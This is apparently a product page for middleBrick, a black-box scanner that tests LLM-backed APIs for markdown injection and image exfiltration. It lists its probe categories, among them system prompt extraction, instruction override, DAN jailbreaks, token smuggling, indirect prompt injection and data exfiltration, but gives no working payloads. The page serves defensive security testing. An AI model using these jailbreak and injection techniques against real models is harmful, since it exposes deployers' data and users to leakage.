42Crunch for Markdown image exfiltration check

What middleBrick covers

18 adversarial LLM probes across Quick, Standard, and Deep tiers
Markdown injection and prompt extraction testing
Black-box scanning without agents or SDKs
Read-only methods with sensitive data protections
Mapping to OWASP API Top 10 (2023), SOC 2 Type II, and PCI-DSS 4.0
CLI and web dashboard for scan management and reporting

Scope of markdown injection assessment

middleBrick targets markdown injection as part of LLM security testing. The scanner executes 18 adversarial probes across three tiers: Quick, Standard, and Deep. These probes include system prompt extraction, instruction override, DAN and roleplay jailbreaks, data exfiltration attempts, cost exploitation, encoding bypasses, translation-embedded injection, few-shot poisoning, markdown injection, multi-turn manipulation, indirect prompt injection, token smuggling, tool-abuse patterns, nested instruction injection, and PII extraction.

How the scanner evaluates markdown handling

The scanner submits markdown payloads through URL-accepting parameters and body fields that support markdown rendering. It checks for active IP-bypass probes and internal IP detection to identify SSRF-related risks that can aid exfiltration. Responses are analyzed for unintended content disclosure, such as rendered sensitive data or model behavior deviations that indicate successful injection.

Mapping to security frameworks

Findings from markdown injection tests map directly to OWASP API Top 10 (2023). The scanner surfaces inputs where markdown processing leads to injection, privilege escalation, or data exposure, and it aligns with security controls described in SOC 2 Type II and PCI-DSS 4.0. Detected issues include improper input validation and unsafe handling of user-supplied content that can lead to unintended system instructions or data leakage.

Integration and operational considerations

middleBrick operates as a black-box scanner without agents or SDKs. Provide the target URL and, if required, authentication via Bearer, API key, Basic auth, or cookie. The domain verification gate ensures only the domain owner can scan with credentials. Header allowlist limits forwarded headers to Authorization, X-API-Key, Cookie, and X-Custom-* to reduce noise.

Scan duration is under one minute. The CLI command for this assessment is:

middlebrick scan <url>

Use JSON output for integration with existing tooling. The scanner does not fix or patch; it reports findings with remediation guidance and a risk score from A to F.

Limitations and complementary testing

middleBrick does not perform active SQL injection or command injection tests, as those require intrusive payloads outside the stated scope. It does not detect business logic vulnerabilities, blind SSRF, or advanced multi-stage exfiltration paths that rely on out-of-band infrastructure. The tool does not replace a human pentester for high-stakes audits, especially when markdown injection intersects with sensitive data handling or complex application workflows.

Frequently Asked Questions

Which markdown injection techniques does the scanner test?

The scanner tests 18 adversarial probes including system prompt extraction, instruction override, DAN jailbreaks, data exfiltration, encoding bypasses, and multi-turn manipulation focused on markdown processing.

Can authenticated scanning be used for markdown injection checks?

Yes, authenticated scanning is supported with Bearer, API key, Basic auth, and cookies. Domain verification is required to ensure scans are performed by the domain owner.

Does the scanner provide compliance mappings for markdown injection findings?

Findings map to OWASP API Top 10 (2023) and support audit evidence for SOC 2 Type II and PCI-DSS 4.0. The tool does not claim compliance with any regulatory framework.

What happens after a markdown injection finding is reported?

The scanner provides a risk score and prioritized findings with remediation guidance. It does not automatically patch or block; developers must apply fixes based on the reported context.